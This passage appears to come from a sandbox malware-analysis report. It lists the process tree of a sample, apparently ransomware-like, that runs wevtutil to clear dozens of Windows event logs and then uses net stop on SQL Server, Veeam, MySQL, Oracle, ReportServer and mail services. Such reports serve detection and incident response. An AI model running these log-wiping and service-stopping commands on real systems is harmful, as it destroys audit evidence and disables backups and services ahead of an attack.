    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:5540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:5564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    - Clears Windows event logs
    PID:5548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:5568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:5612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:5672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:5628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:5752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:5756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    - Clears Windows event logs
    PID:5772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:5808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:5776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:5856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    - Clears Windows event logs
    PID:5852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:5832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:5868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:5900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:5908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:5892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:5924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:5964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:5944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:5932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:5984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    - Power Settings
    PID:6008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:5996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:6040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:6088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:6084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:6044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:6108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:6112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:3800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:2536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:2224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:2144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:3392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:1112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:3068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:2980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:3712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:3644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:6180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:6148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:6176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    - Clears Windows event logs
    PID:6236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:6252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:6220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:6264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:6324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    - Clears Windows event logs
    PID:6304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:6288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:6356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:6360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:6340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:6372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:6392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:6380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    - Clears Windows event logs
    PID:3844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:6408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:6424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:3848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:6436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:6444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:6472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:6496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:6500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:6480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:6520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:6552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:3168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:6560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:6612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:6604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:6568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    - Clears Windows event logs
    PID:6596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:6644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:6640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:6624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:6664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:3584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:3256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    - Clears Windows event logs
    PID:3604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:1964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:4088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:4152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:3540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:4352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:3568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    - Clears Windows event logs
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:4744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:4608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:2476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:1644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:3480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:2692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:3744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:3288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    PID:3828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:3956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:3884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:5268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:5308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:6680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:5336
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:5592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:5348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:5584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:5716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:5640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:5616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:5792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    PID:6012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    PID:5952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:5788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
  2⤵
  PID:1380
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQL_2008"
    3⤵
    PID:1016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
      4⤵
      PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
  2⤵
  PID:3488
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:3596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
  2⤵
  PID:3244
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPS"
    3⤵
    PID:3420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPS"
      4⤵
      PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
  2⤵
  PID:2740
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPSAMA"
    3⤵
    PID:3748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
      4⤵
      PID:3732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:3868
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
  2⤵
  PID:4008
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:3928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
  2⤵
  PID:3272
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher"
    3⤵
    PID:4024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher"
      4⤵
      PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
  2⤵
  PID:920
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:5128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:5136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
  2⤵
  PID:5156
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:5164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:5176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
  2⤵
  PID:5192
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:5208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:5228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
  2⤵
  PID:5264
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:5284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:5288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
  2⤵
  PID:5300
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:5352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:5364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
  2⤵
  PID:5392
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:5416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:5428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
  2⤵
  PID:5444
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:5456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:5472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
  2⤵
  PID:5492
- - C:\Windows\system32\net.exe
    net stop "MSSQLSERVER"
    3⤵
    PID:5504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLSERVER"
      4⤵
      PID:5524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
  2⤵
  PID:5548
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper100"
    3⤵
    PID:5560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
      4⤵
      PID:5572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
  2⤵
  PID:5604
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerOLAPService"
    3⤵
    PID:5624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
      4⤵
      PID:5648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL80"
  2⤵
  PID:5712
- - C:\Windows\system32\net.exe
    net stop "MySQL80"
    3⤵
    PID:5728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL80"
      4⤵
      PID:5748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL57"
  2⤵
  PID:5760
- - C:\Windows\system32\net.exe
    net stop "MySQL57"
    3⤵
    PID:5776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL57"
      4⤵
      PID:5796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
  2⤵
  PID:5824
- - C:\Windows\system32\net.exe
    net stop "OracleClientCache80"
    3⤵
    PID:5832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "OracleClientCache80"
      4⤵
      PID:5848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
  2⤵
  PID:5872
- - C:\Windows\system32\net.exe
    net stop "PDVFSService"
    3⤵
    PID:5892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "PDVFSService"
      4⤵
      PID:5904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
  2⤵
  PID:5920
- - C:\Windows\system32\net.exe
    net stop "POP3Svc"
    3⤵
    PID:5932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "POP3Svc"
      4⤵
      PID:5960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer"
  2⤵
  PID:5992
- - C:\Windows\system32\net.exe
    net stop "ReportServer"
    3⤵
    PID:5996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer"
      4⤵
      PID:6004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
  2⤵
  PID:6024
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SQL_2008"
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
      4⤵
      PID:6080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
  2⤵
  PID:6100
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:6112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
  2⤵
  PID:3808
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPS"
    3⤵
    PID:2224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPS"
      4⤵
      PID:2952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
  2⤵
  PID:4080
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPSAMA"
    3⤵
    PID:2736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
      4⤵
      PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "RESvc"
  2⤵
  PID:3412
- - C:\Windows\system32\net.exe
    net stop "RESvc"
    3⤵
    PID:1316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "RESvc"
      4⤵
      PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sacsvr"
  2⤵
  PID:3764
- - C:\Windows\system32\net.exe
    net stop "sacsvr"
    3⤵
    PID:6156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sacsvr"
      4⤵
